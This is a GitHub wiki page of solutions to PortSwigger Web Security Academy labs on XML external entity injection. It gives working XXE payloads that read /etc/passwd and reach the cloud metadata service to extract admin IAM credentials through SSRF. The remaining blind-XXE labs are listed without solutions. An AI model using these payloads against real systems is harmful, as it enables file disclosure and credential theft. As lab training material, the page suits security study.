XML external entity (XXE) injection - gachikuku/portswigger GitHub Wiki

Apprentice lab:
Exploiting XXE using external entities to retrieve files

  • Solution

    1. Browse an item and check stock.
    2. Observe the requests made. There is a POST request handling XML data.
    3. Reformat (tidy -xml -q) and eadit the request, as shown below. 
      <?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE anything [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck>
<productId>1&xxe;</productId>
<storeId>1</storeId>
</stockCheck>

Apprentice lab:
Exploiting XXE to perform SSRF attacks

  • Solution

    1. Browse an item and check stock.
    2. Observe the requests made. There is a POST request handling XML data.
    3. Reformat (tidy -xml -q) and eadit the request, as shown below. 
      <?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE anything [ <!ENTITY xxe SYSTEM "http://169.254.169.254/"> ]>
<stockCheck>
<productId>&xxe;</productId>
<storeId>1</storeId>
</stockCheck>
    4. Notice an endpoint in the response. Iteratively update the URL in the DTD to explore the API until you reach /latest/meta-data/iam/security-credentials/admin

blind

Practitioner lab:
Blind XXE with out-of-band interaction (Pro)

Practitioner lab:
Blind XXE with out-of-band interaction via XML parameter entities (Pro)

Practitioner lab:
Exploiting blind XXE to exfiltrate data using a malicious external DTD (Pro)

Solutions for the Portswigger's Web Security Academy using mitmproxy and other cli tools instead of Burp Suite

⚠️ **GitHub.com Fallback** ⚠️